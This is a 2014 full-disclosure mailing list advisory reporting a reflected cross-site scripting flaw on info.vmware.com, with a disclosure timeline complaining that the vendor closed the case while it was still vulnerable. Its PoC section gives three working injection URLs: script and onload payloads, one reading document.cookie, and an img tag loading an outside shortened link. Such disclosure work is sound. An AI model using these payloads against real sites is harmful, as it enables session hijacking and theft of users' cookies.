[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] XSS on Vmware Site
From:       "Roberto Garcia Amoriz" <roberto.garcia () rogaramo ! com>
Date:       2014-05-27 18:06:17
Message-ID: 019801cf79d6$5b1a82a0$114f87e0$ () rogaramo ! com
[Download RAW message or body]


Advisory: info.vmware.com – Cross-Site Script Vulnerability (XSS) Advisory
ID: VMware Support Request 14479234605
Author: Roberto Garcia
Affected Software: Successfully tested on info.vmware.com Vendor URL:
htt://info.vmware.com Vendor Status: informed


==========================
Vulnerability Description
==========================

The website "info.vmware.com" is prone to a XSS vulnerability.

This vulnerability involves the ability to inject arbitrary and unauthorized
javascript code. A malicious script inserted into a page in this manner can
hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page.


==========================
PoC-Exploit
==========================

http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3Cimg%20src=%
22http://goo.gl/vxAvX3%22%3E

http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3CBODY%20ONLO
AD=alert%28%22XSSby@1GbDeInfo%22%29%3E

http://info.vmware.com/content/26338_nsx_apj_cities?src=%E2%80%9C%3E%3Cscrip
t%3Ealert%28document.cookie%29%3C/script%3E

PoC video is available at
https://mega.co.nz/#F!78QXhLJJ!jtHAxJWjsJZlEE0gnSXeFw


==========================
Solution
==========================

None


==========================
Disclosure Timeline
==========================

- May 2014. I enrolled in an online course. They sent me an email
confirmation  to see more information. I found a XSS in the URL where vmware
had the  additional info.
- Report vuln May 20, 2014 via email to desktop-services@vmware.com
- Asked by email to send a POC. I sent a video with the POC.
- May 21, 2014. Asked by email to send the original email.
- May 23, 2014. Replied by email that the original address
(vmwareforum@delegate.com) does not belong to them, then vmware.com is not
affected. I said them that the vuln was about info.vmware.com, it was  not
the email address.
- Asked by email to go ahead and close this case on my behalf.
- Closed as fixed, still vulnerable.

==========================
Credits
==========================

Vulnerability found and advisory written by Roberto Garcia




Best regards.

Roberto Garcia Amoriz
Linkedin: Roberto Garcia
Web:  http://www.1gbdeinformacion.com




_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic